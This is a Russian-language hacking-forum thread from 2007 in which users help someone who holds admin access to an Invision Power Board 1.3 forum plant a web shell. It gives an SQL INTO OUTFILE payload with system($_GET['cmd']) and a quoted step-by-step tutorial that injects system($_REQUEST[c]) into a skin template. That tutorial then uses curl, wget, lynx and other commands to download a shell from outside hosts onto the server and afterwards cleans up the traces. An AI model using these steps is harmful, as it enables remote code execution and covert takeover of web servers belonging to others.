Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Несколько вопросов по IPB (https://forum.antichat.xyz/showthread.php?t=40260)

anakreon 17.05.2007 23:37
Несколько вопросов по IPB
 
В общем есть форум ипб 1.3
есть доступ к админке
Но...
нельзя залиться через смайлы

не могу через скуль залить в аплоадс (пишет что доступ запрещен)

через шаблоны выдает: "Этот файл является неправильным файлом шаблона для Invision Power Board"

Не смог понять как воспользоваться скулей типа
Код:
CREATE TABLE `ibf_shell` (`shl` TEXT NOT NULL) TYPE = MYISAM ;  INSERT INTO `ibf_shell` ( `shl` ) VALUES (`пхп-код`);  SELECT `shl` FROM `ibf_shell` INTO OUTFILE `путь/имяфайла.php`  DROP TABLE `ibf_shell`
какой именно пхп-код нужен и путь/имя файла чего именно?

Ах да. http запрос тоже не проходит


Люди добрые помогите плз. С меня плюсы

maxster 18.05.2007 01:37
php-code: system($_GET["cmd"]);

путь до папки аплоадс ( найдешь в генеральных настройках)

anakreon 18.05.2007 08:32
Спасибо но не прокатило.
Выдал что
Код:
Access denied for user: 'тра-та-та@localhost' (Using password: YES)

maxster 18.05.2007 15:01
у тебя нет прав, как правило они только у рута

anakreon 18.05.2007 21:07
ну это понятно. И какой же выход?

maxster 18.05.2007 23:28
Код:
Привет, я DeusTirael.
Сейчас я покажу как можно залить шелл в ИПБ 1.* если не катит способ через смайлы.

Заходим в админку, выбираем SQL Management > mySQL Toolbox > 120_skin_templates

Нужно в столбце func_name изменить значение calendar_start_form
на "aaa(){}}; system($_REQUEST[c]); class qwerty{function ggg"

Для этого делаем один запрос:
update 120_skin_templates set func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb" where func_name="calendar_start_form";

Теперь ставим Use safe mode skins? > Yes

Готово! Заходим в календарь и в параметре 'c' передаем команды.

Заливаем нормальный шелл:
curl --output /papka/na/servere/shell.php http://site.com/shell.php
wget -o /papka/na/servere/shell.php http://site.com/shell.php
get http://site.com/shell.php > /papka/na/servere/shell.php
links -source "http://site.com/shell.php" > /papka/na/servere/shell.php
lynx -source http://site.com/shell.php > /papka/na/servere/shell.php
fetch -o /papka/na/servere/shell.php http://site.com/shell.php
get http://test2.ru/shells/rst.txt > uploads/sh.php

Чистим после себя:
Use safe mode skins? > No
update 120_skin_templates set func_name="calendar_start_form" where func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb";
18.03.2007 by DeusTirael специально для DaMaGeLaB.OrG
Видео использовать только в целях ознакомления.

anakreon 19.05.2007 08:48
Это я тоже делал. Тоже не катит. Выплевывает ошибку при смене safemod skins > да
Код:
Грубая ошибка: Невозможно произвести запись в файл conf_global - изменения не сохранены. Попробуйте изменить атрибут CHMOD на 0777

Doom123 19.05.2007 21:27
http://dump.ru/files/9/97097095/ вот!

видео... заливка шелла на ипб через настройки

maxster 19.05.2007 23:33
Цитата:
Сообщение от Doom123
http://dump.ru/files/9/97097095/ вот!

видео... заливка шелла на ипб через настройки
Способ не актуален для ипб 1.*, он только для 2.*.*

Doom123 20.05.2007 00:03
да извените проморгал версию форума...


Время: 21:15
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице